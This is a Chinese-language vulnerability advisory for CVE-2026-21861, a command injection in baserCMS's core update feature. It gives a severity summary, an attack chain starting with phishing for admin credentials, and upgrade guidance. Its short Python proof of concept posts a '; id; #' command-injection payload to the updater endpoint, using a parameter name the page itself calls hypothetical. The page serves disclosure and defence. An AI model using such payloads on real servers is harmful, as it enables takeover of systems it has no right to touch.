CVE-2026-21861 CVSS 9.1 严重

CVE-2026-21861 baserCMS核心更新功能OS命令注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-21861

漏洞类型

OS命令注入

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

baserCMS

漏洞概述

baserCMS在5.2.3版本之前的核心更新功能中存在操作系统命令注入漏洞。由于系统未对用户控制的输入进行充分的验证或转义，直接传递给exec()函数，导致经过身份认证的管理员能够在服务器上执行任意操作系统命令，严重威胁服务器安全。该问题已在5.2.3版本中修复。

技术细节

该漏洞具体存在于baserCMS的核心更新功能模块中。当经过身份认证的管理员触发系统更新流程时，应用程序未能对用户输入的参数进行严格的边界检查和特殊字符过滤。程序直接将这些受控输入拼接到系统命令字符串中，并传递给PHP的exec()函数执行。攻击者可以利用Shell元字符（如`;`、`|`、`&`）注入并执行任意恶意命令。尽管此漏洞需要管理员权限才能触发，但它允许攻击者突破Web应用沙箱限制，直接获取底层操作系统的控制权，从而对机密性、完整性和可用性造成严重影响。

攻击链分析

STEP 1

1. 获取凭证

攻击者通过钓鱼或其他手段获取baserCMS管理员账户的用户名和密码。

STEP 2

2. 访问功能点

攻击者登录后台，访问核心更新功能模块。

STEP 3

3. 注入恶意命令

在更新功能的输入字段中插入包含Shell元字符的恶意Payload。

STEP 4

4. 执行命令

服务器端exec()函数执行拼接后的恶意命令，返回执行结果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "http://target-site/admin/baser-core/updater/index"
# Administrator session cookie (Required)
cookies = {"PHPSESSID": "valid_admin_session_id"}

# Payload to execute 'id' command
# The input is directly passed to exec() without sanitization
payload = "; id; #"

data = {
    "update_param": payload  # Hypothetical parameter name based on vulnerability description
}

response = requests.post(target_url, cookies=cookies, data=data)
print("Response:", response.text)

影响范围

baserCMS < 5.2.3

防御指南

临时缓解措施

建议立即将baserCMS升级至5.2.3版本。如果暂时无法升级，应严格限制对后台管理面板的访问，仅允许受信任的IP地址访问，并加强对管理员账户的监控，直到完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表